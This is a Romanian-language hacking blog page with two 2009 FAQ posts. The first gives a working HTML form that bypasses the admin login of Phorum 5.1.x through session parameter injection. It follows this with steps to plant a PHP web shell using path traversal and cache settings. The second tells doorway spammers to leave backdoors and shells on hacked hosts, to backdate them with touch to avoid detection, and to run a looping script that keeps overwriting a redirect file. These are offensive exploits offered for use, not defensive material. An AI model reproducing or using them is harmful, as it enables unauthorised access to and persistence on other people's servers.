RicH and FamouS

       Home         Glosar IT                                                                                                                                                                                                              SUBSCRIBE NOW!
        
Se afișează postările cu eticheta Shell. Afișați toate postările
Se afișează postările cu eticheta Shell. Afișați toate postările

04.07.2009

FAQs - №5

Problema: Am auzit, că se poate cumva de intrat în Admin Control Panel al ultimelor versiuni de Phorum 5.1.x fără ca sa ştii parola administratorului. Ştii ceva amănunte despre aceasta?

Rezolvare: Destul de simplu ! Pentru aceasta ai nevoie de a crea un mic html-file cu următorul conţinut:
Cod:
<_html>
<_body>
<_form action="http://phorum.site.com/admin.php" method="POST">
<_input type="hidden" name="phorum_admin_session[]" value="1">
<_input type="hidden" name="phorum_session_v5[]" value="=1">
<_input type="submit" calue="Inject ! ">
<_/form>
<_/body>
<_/html>
P.S. Liniile _ din cod se elimina
După submit tu te vei afla în Admin Control Panel al Phorum-ului. În unele cazuri merge următorul mod de încărcare a shell-ului pe baza bug-ului prezentat mai sus:
  1. Intrăm în pagina de redactare a profilului administratorului. În semnătura lui punem un mic shell ca acesta: <_?php>'; system($_GET [cmd]); print '<_/pre>'; ?>.
  2. În rezultat afişării unui cod incorect în profilul administratorului observăm o greşeală << full path disclosure în momentul intrării in pagina principală a forumului >>. Copiem calea către fişierul cache.php ( de exemplu /home/www/phorum/cache.php), care apoi îi vom face shell în md5.
  3. În configuraţiile Phorum bifăm secţiunea cache users. Arătăm calea pentru fişierele shell-uite /../../../../../../../../../../../../../../../../tmp şi în default language punem /../../../../../../../../../../../../../../../../../tmp/md5('home/www/phorum/cache.php')/user/c4ca/4238/a0b9/2382/0dcc/509a/6f75/849b/data.
  4. Din nou intrăm în Admin Control Panel pentru a activa noul cod în cache şi primim plăcere de la shell. În momentul cînd am scris acest FAQ ambele bug-uri nu erau încă astupate.

29.06.2009

FAQs - №4

Problema: Ocupîndu-mă cu SEO, am întîlnit problema furtului a doorway-urilor. Cum mă pot proteja eu de această "năpastie"?

Rezolvare: Dacă tu faci doorway pe host, hack-uit prin Public Vulnerability pe motorul instalat acolo, atunci poti închide catalogul cu acel motor cu ajutorul chmod, modifică parola hash a administratorului în ceva de genul acesta haha&_$#@%. Dar de obicei aceasta puţin ce ajută, şi doorway-erii întîlnesc problema furtului doorway-urilor post factum, de aceea ţine minte următoarea regulă: pentru ca mai uşor să îţi poţi intoarce doorway-ul, lasă cîte mai multe backdoor-uri şi Shell-uri pe hostul hack-uit, însă cu toate acestea nu uita timpul de modificare a fişierelor prin comanda touch -t AnLunăZiOrăMinuteSecunde shell.php. Dupa furtul de doorway primul lucru care trebuie să îl faci este să găseşti şi să ştergi Shell-urile persoanelor nedorite ( aceasta se poate de facut cu ajutorul comenzii find - -mtime -60-grep.php ), apoi schimbă readresarea către shell-ul tău şi protejazăte cu ajutorul următorului scenariu-php:
Cod:
<_?php
ignore_user_abort(true);
set_time_limit(0);
while (!is_file('stop.dat'))
{
@chmod('/var/www/html/catalog',0777);
$textht='<_?php
header("Location: http://shell-ul_tău.com");
?>';
$fp = @fopen("/var/www/html/catalog/index.php","w");
@flock ($fp, LOCK_EX);
@fput ($fp, $textht);
@flock ($fp, LOCK_UN);
@fclose ($fp);
sleep(5);
}
?_>
P.S. Linia _ din cod se elimina
Încarcă scriptul cu acest cod ( schimbînd dinainte drumul către locaţia unde la tine stă doorway-ul ) într-un oarecare catalog pe server, disponibil din internet, şi lanseazăl în browser. După acesta poţi închide browser-ul. :) Scriptul cu periodicitatea de 5 secunde va rescrie fişierul cu readresarea către al tău, aşa că jefuitorii se vor mira foarte tare cînd vor înscrie fişierul propriu cu readresarea, însă în locul lui momentan va apărea altul.

    Blog din Moldova    FastCounter 

 
Copyright © 2008-2010 Foster1. All rights reserved.